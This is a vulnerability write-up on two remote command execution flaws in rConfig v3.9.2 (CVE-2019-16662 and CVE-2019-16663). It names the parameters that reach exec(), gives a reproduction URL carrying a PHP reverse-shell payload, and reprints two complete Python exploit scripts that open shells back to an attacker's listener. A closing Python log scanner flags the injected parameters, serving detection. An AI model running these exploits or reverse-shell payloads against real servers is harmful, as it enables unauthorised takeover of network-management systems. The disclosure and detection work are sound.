# (CVE-2019-16662)(CVE-2019-16663) rConfig v3.9.2 Remote Command Execution

1. Vulnerability Overview
-------------------------

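I found two remote code execution vulnerabilities in two separate files. The first is in ajaxServerSettingsChk.php: an attacker can send a crafted GET request through the rootUname parameter and trigger an unauthenticated RCE. The rootUname parameter is defined on line 2 of the source file and is then passed to the exec function on line 13, so an attacker can craft the parameter's value to make the operating system execute malicious commands. This vulnerability is easy to find and to exploit; later in this write-up I describe how to find and exploit it.

The second vulnerability was found in search.crud.php, and this file requires authentication before the remote code execution can be triggered. It can be triggered with a GET request that contains two parameters. The searchTerm parameter can hold any value, but it must be present for execution to reach the exec function on line 63.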

2. Affected Versions
--------------------

rConfig v3.9.2

3. Reproduction
---------------

```
https://www.0-sec.org/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=`php -r '$sock=fsockopen("1.2.3.4",1234);exec("/bin/sh -i <&3 >&3 2>&3");'`
```

![](/static/qingy/(CVE-2019-16662)(CVE-2019-16663)rConfig_v3.9.2_远程命令执行/img/rId24.png)

Python script 1

```python
#!/usr/bin/python
# Python 2 script (print statements, urllib.quote)

# Exploit Title: rConfig v3.9.2 unauthenticated Remote Code Execution
# Date: 18/09/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2019-16662
# Vendor Homepage: https://rconfig.com/
# Software link: https://rconfig.com/download
# Version: v3.9.2
# Tested on: CentOS 7.7 / PHP 7.2.22

import requests
import sys
from urllib import quote
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 4:
    print "[+] Usage : ./exploit.py target ip port"
    exit()

target = sys.argv[1]

ip = sys.argv[2]

port = sys.argv[3]

payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port))

install_path = target + "/install"

# The vulnerable handler lives under /install, so the directory must still exist
req = requests.get(install_path, verify=False)
if req.status_code == 404:
    print "[-] Installation directory not found!"
    print "[-] Exploitation failed !"
    exit()
elif req.status_code == 200:
    print "[+] Installation directory found!"
url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload

print "[+] Triggering the payload"
print "[+] Check your listener !"

requests.get(url_to_send, verify=False)
```

![](/static/qingy/(CVE-2019-16662)(CVE-2019-16663)rConfig_v3.9.2_远程命令执行/img/rId25.png)

Python script 2

```python
#!/usr/bin/python
# Python 2 script (print statements, urllib.quote)

# Exploit Title: rConfig v3.9.2 Authenticated Remote Code Execution
# Date: 18/09/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2019-16663
# Vendor Homepage: https://rconfig.com/
# Software link: https://rconfig.com/download
# Version: v3.9.2
# Tested on: CentOS 7.7 / PHP 7.2.22

import requests
import sys
from urllib import quote
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 6:
    print "[+] Usage : ./exploit.py target username password ip port"
    exit()

target = sys.argv[1]

username = sys.argv[2]

password = sys.argv[3]

ip = sys.argv[4]

port = sys.argv[5]

request = requests.session()

login_info = {
    "user": username,
    "pass": password,
    "sublogin": 1
}

login_request = request.post(
    target+"/lib/crud/userprocess.php",
    login_info,
    verify=False,
    allow_redirects=True
)

# A 200 on the dashboard means the session is authenticated; a 302 means the login failed
dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)

if dashboard_request.status_code == 200:
    print "[+] LoggedIn successfully"
    payload = '''""&&php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port)
    encoded_request = target+"/lib/crud/search.crud.php?searchTerm=anything&catCommand={0}".format(quote(payload))
    print "[+] triggering the payload"
    print "[+] Check your listener !"
    exploit_req = request.get(encoded_request)

elif dashboard_request.status_code == 302:
    print "[-] Wrong credentials !"
    exit()
```

![](/static/qingy/(CVE-2019-16662)(CVE-2019-16663)rConfig_v3.9.2_远程命令执行/img/rId26.png)
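
For defenders, both request patterns above leave a recognizable trace in web server access logs. The following is an added example, not part of the original write-up or of rConfig itself: a Python 3 check that flags shell metacharacters in `rootUname` and `catCommand` on the two endpoints. The combined log format, the metacharacter list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint suffix -> (CVE, query parameter that reaches exec() per the write-up).
WATCHED = {
    "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php": ("CVE-2019-16662", "rootUname"),
    "/lib/crud/search.crud.php": ("CVE-2019-16663", "catCommand"),
}
# Characters that let a value break out of a shell command line (heuristic, assumed list).
SHELL_META = re.compile(r"[;&|`$<>\\'\"()\n]")
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def inspect_line(line):
    """Return (cve, param, decoded_value) for a suspicious request, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    for suffix, (cve, param) in WATCHED.items():
        if not url.path.endswith(suffix):
            continue
        # parse_qs percent-decodes, so encoded metacharacters are seen in clear.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if SHELL_META.search(value):
                return (cve, param, value)
    return None

def scan(lines):
    """Return all findings for an iterable of log lines."""
    return [hit for hit in map(inspect_line, lines) if hit]

# Constructed sample log lines (documentation addresses, harmless marker commands).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Sep/2019:10:00:01 +0000] "GET /install/lib/ajaxHandlers/'
    'ajaxServerSettingsChk.php?rootUname=root HTTP/1.1" 200 57',
    '192.0.2.66 - - [18/Sep/2019:10:02:13 +0000] "GET /install/lib/ajaxHandlers/'
    'ajaxServerSettingsChk.php?rootUname=%3Becho%20marker%23 HTTP/1.1" 200 57',
    '192.0.2.66 - - [18/Sep/2019:10:05:40 +0000] "GET /lib/crud/search.crud.php'
    '?searchTerm=anything&catCommand=%22%22%26%26echo%20marker%23 HTTP/1.1" 200 12',
    '192.0.2.10 - - [18/Sep/2019:10:07:02 +0000] "GET /lib/crud/search.crud.php'
    '?searchTerm=router&catCommand=show HTTP/1.1" 200 840',
]

if __name__ == "__main__":
    for cve, param, value in scan(SAMPLE_LOG):
        print(f"{cve}: {param}={value!r}")
```

The check only sees query strings, so it covers the GET-based requests shown on this page and nothing sent in a request body.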
